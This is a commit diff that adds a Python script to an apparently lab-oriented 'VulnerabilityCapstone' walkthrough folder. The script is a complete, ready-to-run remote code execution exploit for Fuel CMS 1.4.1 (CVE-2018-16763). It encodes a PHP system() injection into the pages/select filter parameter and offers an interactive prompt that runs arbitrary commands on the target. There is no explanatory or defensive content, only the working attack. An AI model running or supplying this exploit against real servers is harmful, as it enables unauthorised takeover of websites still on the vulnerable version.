initial commit

Walkthroughs/VulnerabilityCapstone/exploit2.py

@@ -0,0 +1,63 @@
+# Exploit Title: Fuel CMS 1.4.1 - Remote Code Execution (3)
+# Exploit Author: Padsala Trushal
+# Date: 2021-11-03
+# Vendor Homepage: https://www.getfuelcms.com/
+# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
+# Version: <= 1.4.1
+# Tested on: Ubuntu - Apache2 - php5
+# CVE : CVE-2018-16763
+
+#!/usr/bin/python3
+
+import requests
+from urllib.parse import quote
+import argparse
+import sys
+from colorama import Fore, Style
+
+def get_arguments():
+	parser = argparse.ArgumentParser(description='fuel cms fuel CMS 1.4.1 - Remote Code Execution Exploit',usage=f'python3 {sys.argv[0]} -u <url>',epilog=f'EXAMPLE - python3 {sys.argv[0]} -u http://10.10.21.74')
+
+	parser.add_argument('-v','--version',action='version',version='1.2',help='show the version of exploit')
+
+	parser.add_argument('-u','--url',metavar='url',dest='url',help='Enter the url')
+
+	args = parser.parse_args()
+
+	if len(sys.argv) <=2:
+		parser.print_usage()
+		sys.exit()
+
+	return args
+
+
+args = get_arguments()
+url = args.url
+
+if "http" not in url:
+	sys.stderr.write("Enter vaild url")
+	sys.exit()
+
+try:
+   r = requests.get(url)
+   if r.status_code == 200:
+       print(Style.BRIGHT+Fore.GREEN+"[+]Connecting..."+Style.RESET_ALL)
+
+
+except requests.ConnectionError:
+    print(Style.BRIGHT+Fore.RED+"Can't connect to url"+Style.RESET_ALL)
+    sys.exit()
+
+while True:
+	cmd = input(Style.BRIGHT+Fore.YELLOW+"Enter Command $"+Style.RESET_ALL)
+
+	main_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+quote(cmd)+"%27%29%2b%27"
+
+	r = requests.get(main_url)
+
+	#<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">
+
+	output = r.text.split('<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">')
+	print(output[0])
+	if cmd == "exit":
+		break